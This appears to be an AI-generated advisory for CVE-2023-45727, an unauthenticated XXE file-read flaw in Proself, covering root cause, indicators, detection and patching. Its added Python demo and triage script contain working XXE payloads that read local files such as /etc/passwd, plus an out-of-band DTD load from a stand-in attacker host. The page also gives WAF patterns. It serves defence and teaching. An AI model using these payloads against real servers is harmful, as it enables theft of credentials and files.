CVE-2023-45727 Overview
CVE-2023-45727 is an XML External Entity (XXE) injection vulnerability (CWE-611) affecting multiple editions of Northgrid's Proself file sharing and storage product. A remote, unauthenticated attacker can send a specially crafted request whose XML body carries external entity declarations; the XML is well-formed, but the server's parser resolves those entities instead of rejecting them. Successful exploitation lets the attacker read arbitrary files on the server, including files that contain account information.
Critical Impact
This vulnerability is actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating confirmed malicious exploitation. Remote unauthenticated attackers can exfiltrate sensitive server files including account credentials.
Affected Products
- Proself Enterprise/Standard Edition Ver5.62 and earlier
- Proself Gateway Edition Ver1.65 and earlier
- Proself Mail Sanitize Edition Ver1.08 and earlier
Discovery Timeline
- October 18, 2023 - CVE-2023-45727 published to NVD
- October 24, 2025 - Last updated in NVD database
Technical Details for CVE-2023-45727
Vulnerability Analysis
This XXE vulnerability resides in the XML parsing functionality of Northgrid Proself products. The application fails to properly disable external entity processing when parsing XML input from user requests. This improper restriction of XML External Entity Reference (CWE-611) allows attackers to craft malicious XML payloads that instruct the XML parser to fetch external resources or local files.
The vulnerability is particularly severe because it requires no authentication to exploit. An attacker can simply send a crafted HTTP request to the vulnerable Proself server, and the XML parser will process the malicious payload without any access controls. The confidentiality impact is significant as attackers can read arbitrary files from the server's filesystem, including configuration files and account information that may contain credentials or sensitive business data.
Root Cause
The root cause is an XML parser that runs with external entity resolution enabled. When Proself processes incoming XML, it neither disables Document Type Definition (DTD) processing nor external entity resolution, so an attacker can declare entities that reference local files or external URLs. The parser resolves them and splices the result into the document it hands to the application, from where it can surface in the response or in error messages. The public advisory does not identify the specific parser library or endpoint involved; the fix is delivered in the patched releases.
Attack Vector
The attack is conducted over the network and needs neither authentication nor user interaction. The attacker sends an HTTP request to the Proself server whose XML body carries a DOCTYPE with an external entity declaration; when the server parses it, the entity is resolved and its content is expanded into the document. The advisory confirms arbitrary file read. The other two outcomes below are general consequences of an XXE-capable parser and are not confirmed for Proself:
- Read local files that the Proself service account can open (e.g., /etc/passwd, application configuration files, files holding account information)
- Perform server-side request forgery (SSRF) against internal network resources, if the parser also resolves http:// or similar URLs
- Cause denial of service through nested entity expansion (the "billion laughs" attack), which uses internal entities and does not need external entity resolution at all
In-band XXE returns the file contents inside the application's response or error message. Where the response does not echo the entity, out-of-band techniques (a parameter entity that loads an attacker-hosted DTD) can exfiltrate the data to an attacker-controlled server instead.
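The following is an added example, not Proself code and not taken from the advisory. It uses Python's xml.sax on top of expat (chosen because it ships with the standard library, not because Proself uses it) to show the root cause and the in-band attack side by side: one parser has external general entity resolution switched on, the other keeps it off and rejects any DOCTYPE outright. The target file, its contents and the payload are all constructed inline so the demo runs offline; the file name and the request element names are assumptions.

```python
"""Vulnerable and hardened XML parsing side by side (added example, not Proself code).

The "vulnerable" path turns on external general entity resolution, which is what an
application ends up with (often through parser defaults) when it has a CWE-611 bug
like CVE-2023-45727. The "hardened" path leaves it off and refuses DTDs entirely.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class TextCollector(ContentHandler):
    """Gathers character data, i.e. whatever the entity expands to."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


class DtdRejecter:
    """Lexical handler that aborts parsing the moment a DOCTYPE appears."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DTD not allowed: %r" % name)

    # expat's reader wires up all five callbacks, so the others must exist.
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse_vulnerable(xml_bytes):
    """Resolves external entities: a SYSTEM entity pointing at a file leaks that file."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the CWE-611 mistake
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def parse_hardened(xml_bytes):
    """Keeps external entities off and refuses any document carrying a DTD."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # explicit, even though it is the default
    parser.setProperty(property_lexical_handler, DtdRejecter())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def build_payload(target_path):
    """Classic in-band XXE: declare an external entity, reference it in a text node."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE req [\n'
        '  <!ENTITY xxe SYSTEM "file://%s">\n'
        ']>\n'
        '<req><user>&xxe;</user></req>' % target_path
    ).encode("utf-8")


def xxe_demo():
    """Runs the payload against both parsers; returns what each one produced."""
    # Constructed stand-in for an account/config file an attacker would target.
    with tempfile.NamedTemporaryFile("w", suffix=".properties", delete=False) as f:
        f.write("admin.user=proself\nadmin.password=constructed-demo-secret\n")
        secret_path = f.name
    try:
        payload = build_payload(secret_path)
        leaked = parse_vulnerable(payload)
        try:
            hardened = parse_hardened(payload)
        except ValueError as exc:
            hardened = "rejected: %s" % exc
    finally:
        os.unlink(secret_path)
    return {"vulnerable": leaked, "hardened": hardened}


if __name__ == "__main__":
    for mode, result in xxe_demo().items():
        print("%-10s %r" % (mode, result))
```

The vulnerable parser returns the whole secret file as the text of the user element, which is exactly the "read arbitrary files on the server" outcome in the advisory. Rejecting the DTD rather than only disabling external entities is the stronger posture: it also shuts down internal-entity expansion attacks and external DTD subsets, neither of which the external-entity switch alone addresses.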
Detection Methods for CVE-2023-45727
Indicators of Compromise
- Unusual HTTP requests to Proself endpoints containing XML payloads with <!DOCTYPE> declarations or <!ENTITY> definitions
- File access audit records (e.g., auditd or equivalent) showing the Proself service account reading files it has no business opening, such as /etc/passwd or application configuration files; note that /etc/shadow is normally unreadable to a non-root service account, and that application logs alone rarely record in-process file reads
- Outbound connections from the Proself server to unexpected external hosts (indicating out-of-band XXE exfiltration)
- HTTP requests containing common XXE payload patterns such as SYSTEM, PUBLIC, or file:// protocol handlers
Detection Strategies
- Monitor and alert on HTTP requests to Proself servers that contain XML payloads with entity declarations
- Implement Web Application Firewall (WAF) rules to detect and block common XXE payload patterns
- Configure network monitoring to detect unusual outbound connections from Proself servers
- Review Proself application logs for error messages that may indicate failed XXE exploitation attempts
Monitoring Recommendations
- Enable detailed logging on Proself servers to capture full request bodies for security analysis
- Deploy network intrusion detection systems (IDS) with signatures for XXE attack patterns
- Monitor file access patterns on the Proself server for unauthorized reads of sensitive system files
- Implement egress filtering to prevent data exfiltration through out-of-band XXE techniques
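As an added example (not part of the original page and not a Proself component), the following Python triage function implements the indicators listed above over constructed request records and handles two evasions that defeat naive byte-pattern matching: UTF-16 encoded bodies and percent-encoded form posts. The request fields, source addresses and paths are assumptions for the demo, not Proself's log format or endpoints. The same decode-then-match logic is what the WAF workaround later on this page needs, applied to the decoded request body.

```python
"""Triage of request bodies for XXE indicators (added example, not a Proself component).

Looks for the indicators a practitioner watches for: DOCTYPE declarations, ENTITY
definitions, SYSTEM/PUBLIC identifiers and file:// URIs, after normalising the body the
way the XML parser would see it. All sample traffic below is constructed.
"""
import re
from urllib.parse import quote, unquote_plus

# External DTD subset or external entity: the parser is being told to fetch something.
EXTERNAL_REF_RE = re.compile(
    r"<!(?:DOCTYPE|ENTITY)\s+%?\s*\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
FILE_URI_RE = re.compile(r"\bfile://", re.IGNORECASE)
ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def normalise_body(raw: bytes) -> str:
    """Bring the body into the form the XML parser will actually see."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")          # BOM-prefixed UTF-16 hides ASCII signatures
    else:
        text = raw.decode("utf-8", errors="replace")
    if "<!" not in text and "%3C%21" in text.upper():
        text = unquote_plus(text)            # undo one layer of form/percent encoding
    return text


def classify_body(raw: bytes) -> str:
    """Return one of: clean, doctype-only, internal-entities, external-reference."""
    text = normalise_body(raw)
    if not DOCTYPE_RE.search(text):
        return "clean"
    if EXTERNAL_REF_RE.search(text) or FILE_URI_RE.search(text):
        return "external-reference"          # file read, SSRF or out-of-band DTD load
    if ENTITY_RE.search(text):
        return "internal-entities"           # entity expansion / billion laughs territory
    return "doctype-only"                    # block under the workaround, log otherwise


def triage(requests):
    """requests: iterable of (src_ip, path, body_bytes); returns (src_ip, path, verdict)."""
    return [(src, path, classify_body(body)) for src, path, body in requests]


# Constructed sample traffic. Paths are placeholders, not real Proself endpoints.
_XXE = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b'<r><u>&xxe;</u></r>')
_OOB = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://203.0.113.5/x.dtd">'
        b'%dtd;]><r/>')
_LOL = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
        b'<r>&b;</r>')
SAMPLE_REQUESTS = [
    ("198.51.100.10", "/api/upload", b'<?xml version="1.0"?><r><u>alice</u></r>'),
    ("198.51.100.11", "/api/upload", _XXE),
    ("198.51.100.12", "/api/upload", _XXE.decode().encode("utf-16")),
    ("198.51.100.13", "/api/upload", b"data=" + quote(_XXE.decode(), safe="").encode()),
    ("198.51.100.14", "/api/upload", _OOB),
    ("198.51.100.15", "/api/upload", _LOL),
    ("198.51.100.16", "/api/upload", b'<!DOCTYPE r [<!ELEMENT r EMPTY>]><r/>'),
]

if __name__ == "__main__":
    for src, path, verdict in triage(SAMPLE_REQUESTS):
        print("%-15s %-12s %s" % (src, path, verdict))
```

Alert on "external-reference" and "internal-entities" outright; "doctype-only" is worth logging because legitimate Proself clients have no reason to send a DTD, and a flood of those from one source usually means someone is probing the parser before committing a real payload.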
How to Mitigate CVE-2023-45727
Immediate Actions Required
- Update all Proself installations to the patched releases immediately (Enterprise/Standard Edition later than Ver5.62, Gateway Edition later than Ver1.65, Mail Sanitize Edition later than Ver1.08)
- If immediate patching is not possible, consider temporarily restricting network access to Proself servers
- Review server logs for any signs of exploitation and investigate any suspicious XML-based requests
- Implement WAF rules to block requests containing XML external entity declarations as a temporary mitigation
Patch Information
Northgrid has released security updates that address this vulnerability. Administrators should upgrade to versions later than the affected releases. Detailed patch information is available in the Proself information release from Northgrid; additional technical details are in the JVN advisory JVN#95981460.
Given that this vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, federal agencies and organizations following CISA guidance should prioritize remediation according to the specified deadlines. The CISA KEV entry provides additional remediation guidance.
Workarounds
- Deploy a Web Application Firewall (WAF) configured to block XML payloads containing DOCTYPE declarations and ENTITY definitions
- Restrict network access to Proself servers to trusted IP ranges only until patches can be applied
- Disabling DTD processing and external entity resolution in the XML parser is the standard fix for CWE-611, but in a packaged product like Proself the parser configuration lives inside the application and is not an administrator-tunable setting unless the vendor documents one; expect this fix to arrive through the patch rather than as a workaround you apply yourself
- Implement network segmentation to limit the impact of potential file disclosure from compromised Proself servers
# Example WAF rule concepts for blocking XXE patterns
# Block requests whose body declares a DTD
# Pattern: <!DOCTYPE
# Block requests that define entities
# Pattern: <!ENTITY
# Block SYSTEM or PUBLIC identifiers; these only matter inside a DOCTYPE or ENTITY declaration
# Pattern: <!DOCTYPE ... SYSTEM / <!ENTITY ... SYSTEM / <!ENTITY ... PUBLIC
# Apply the patterns to the decoded body: UTF-16 encoding and percent-encoding defeat rules
# that match raw bytes, and a parameter entity (<!ENTITY % x SYSTEM "...">) loads the real
# payload from an external DTD, so the declaration is all the rule will ever see
# Consult your specific WAF documentation for implementation syntax
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.